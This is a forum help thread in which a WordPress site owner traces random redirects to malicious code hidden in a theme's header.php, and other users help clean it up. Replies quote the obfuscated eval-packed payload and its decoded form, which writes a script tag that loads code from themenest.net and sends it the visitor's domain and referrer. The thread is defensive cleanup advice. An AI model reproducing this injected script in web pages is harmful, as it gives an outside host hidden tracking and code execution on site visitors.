• We’re currently investigating an issue related to the forum theme and styling that is impacting page layout and visual formatting. The problem has been identified, and we are actively working on a resolution. There is no impact to user data or functionality, this is strictly a front-end display issue. We’ll post an update once the fix has been deployed. Thanks for your patience while we get this sorted.

My website is getting hijacked every nth click?

nboy22

nboy22

Diamond Member
Hey everyone, just looking for some advice here.

My website, www.brandonclark.net seems to be getting hijacked every so often. I know it is NOT my web browser, because it is tested from 4 different machines. If you keep clicking all the links eventually it will get hijacked.

It doesn't even make sense, it is from a clean install of wordpress and a theme. I am still in the process of setting it up and this has been happening from the beginning. Is there any logging system I can use to log where this is coming from so I can narrow it down and eliminate it?

Thanks for any advice!
 
amdhunter said:
http://wordpress.org/support/topic/wordpress-sites-getting-redirected

I got redirected after the 3rd click.
http://www.unmaskparasites.com/security-report/ found this script:

eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c-...

I dunno what that means...
Click to expand...

Thanks, let me look into this. I found another thread about this function and someone figured out how to take it out or modify something that might have to do with the hijacker.
 
nboy22 said:
Thanks, let me look into this. I found another thread about this function and someone figured out how to take it out or modify something that might have to do with the hijacker.
Click to expand...

Well if you're using a minimized JavaScript library it may be packed.

What version of WordPress are you using?
 
1) Find a great web host (GoDaddy.com doesn't qualify) with proactive and quality support, unfortunately a great web hosts costs $$.

2) It's not uncommon for WP to get hacked, there are dozens of threads like this on WebHostingTalk.com:
http://www.webhostingtalk.com/showthread.php?t=1148386

Keep it updated and secure constantly, it's almost as bad as phpBB forum software.
 
RossMAN said:
1) Find a great web host (GoDaddy.com doesn't qualify) with proactive and quality support, unfortunately a great web hosts costs $$.

2) It's not uncommon for WP to get hacked, there are dozens of threads like this on WebHostingTalk.com:
http://www.webhostingtalk.com/showthread.php?t=1148386

Keep it updated and secure constantly, it's almost as bad as phpBB forum software.
Click to expand...

Have several domains hosted with godaddy, they NEVER been hacked.
 
Yazoo said:
Have several domains hosted with godaddy, they NEVER been hacked.
Click to expand...

I don't really think it's a godaddy issue. Whatever it is, it is deep rooted somewhere and I will probably just end up reinstalling the theme and copying all my pages over to get rid of it. I'm downloading all site files and going to run a search on all files for "eval(base64_decode" and see if it catches anything suspicious. I am not really a web programmer so where all these malware hacks could be hiding is not too clear to me.
 
nboy22 said:
I don't really think it's a godaddy issue. Whatever it is, it is deep rooted somewhere and I will probably just end up reinstalling the theme and copying all my pages over to get rid of it. I'm downloading all site files and going to run a search on all files for "eval(base64_decode" and see if it catches anything suspicious. I am not really a web programmer so where all these malware hacks could be hiding is not too clear to me.
Click to expand...

Where did you get the theme?
 
The issue with using popular CMSes like Wordpress is that if they have any security holes, lot of hackers and script kiddies know about them.

Hackes actually Google the copyright notice at the bottom of known web apps so they can find sites to exploit, and they just go at it.
 
Red Squirrel said:
The issue with using popular CMSes like Wordpress is that if they have any security holes, lot of hackers and script kiddies know about them.

Hackes actually Google the copyright notice at the bottom of known web apps so they can find sites to exploit, and they just go at it.
Click to expand...

Fun stuff. Bastards. Oh well I suppose I'll just copy the code for each page I have and then reinstall the theme and then backup before something like this happens again.
 
I manage multiple WordPress websites and have had several hacked before.

Things to check:

1. Check your .htaccess file. Look for signs of unauthorized redirects. If it looks weird, it's probably a hack.

2. Look in the header of your theme php files. If the code looks weird, it's a hack.

3. Did you download all of your plugins and theme from a legit source? Did you download any cracks? If you pirated any plugins or your theme, the hack came with it.
 
This is what the packed script unpacks to:

Code: 
document.write('<scr'+'ipt type="text/javascript" src="http://themenest.net/platform/script/track?d='+document.domain+'&r='+encodeURIComponent(document.referer)+'&c='+Math.floor((Math.random()*1000)+1)+'"></scr'+'ipt>');
A google search for themenest.net serving malware brings up some similar hits, including an identical problem to yours:

http://stackoverflow.com/questions/14476868/my-website-redirects-to-malicious-sites

That site is not to be trusted. I assume that is where you got your theme, and they are intentionally embedding obfuscated javascript into the theme - not only tracking your visitors, but executing anything they want whenever they want.


http://www.networksolutions.com/whois/results.jsp?domain=themenest.net

Technical Contact: AnonymousSpeech AnonyousSpeech AnonymousSpeech (contact@anonymousspeech.com) +81.09037462746 Fax: +81.09037462746 1-3-3 Sakura House Tokyo, TOKYO 169-0072 JP
 
Last edited:
SagaLore said:
This is what the packed script unpacks to:

Code: 
document.write('<scr'+'ipt type="text/javascript" src="http://themenest.net/platform/script/track?d='+document.domain+'&r='+encodeURIComponent(document.referer)+'&c='+Math.floor((Math.random()*1000)+1)+'"></scr'+'ipt>');
A google search for themenest.net serving malware brings up some similar hits, including an identical problem to yours:

http://stackoverflow.com/questions/14476868/my-website-redirects-to-malicious-sites

That site is not to be trusted. I assume that is where you got your theme, and they are intentionally embedding obfuscated javascript into the theme - not only tracking your visitors, but executing anything they want whenever they want.


http://www.networksolutions.com/whois/results.jsp?domain=themenest.net

Technical Contact: AnonymousSpeech AnonyousSpeech AnonymousSpeech (contact@anonymousspeech.com) +81.09037462746 Fax: +81.09037462746 1-3-3 Sakura House Tokyo, TOKYO 169-0072 JP
Click to expand...

I removed the script that I think pertained to this information at the top of my header.php. Hopefully that works. I am having a friend test it because for some weird reason it doesn't show me the spam on 3 different browsers on my computer and I'm not even logged into wordpress.
 
Awesome, that did the trick. Seems like the spam is gone for now. We shall see if it stays that way. Thanks guys for all your help, you have saved me a lot of time!
 
RossMAN said:
You're in Phoenix but have an Idaho (208) phone number?
Click to expand...

cell_number.png
 
RossMAN said:
You're in Phoenix but have an Idaho (208) phone number?
Click to expand...

Yup lol. My parents have a family plan so I just contribute to make it cheaper for everyone and I don't think sprint will let me change my number, at least quite a few years ago they wouldn't. Not sure if anything has changed now.
 
Last edited:
Check the header file from the theme that you're using for this string:

<script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0.f(\'<2\'+\'3 5="6/7" 8="9://a.b/e/o/g?d=\'+0.h+\'&i=\'+j(0.k)+\'&c=\'+4.l((4.m()*n)+1)+\'"></2\'+\'3>\');',25,25,'document||scr|ipt|Math|type|text|javascript|src|http|themenest|net|||platform|write|track|domain|r|encodeURIComponent|referrer|floor|random|1000|script'.split('|'),0,{}));</script>

Then see if there's a cache folder anywhere in he Wordpress directory or subdirectories and clear out anything in there. That should take care of it. Then lock that bad boy down so it don't happen again. Real pain in the butt. Hope this helps
 
You must log in or register to reply here.

TRENDING THREADS

Back
Top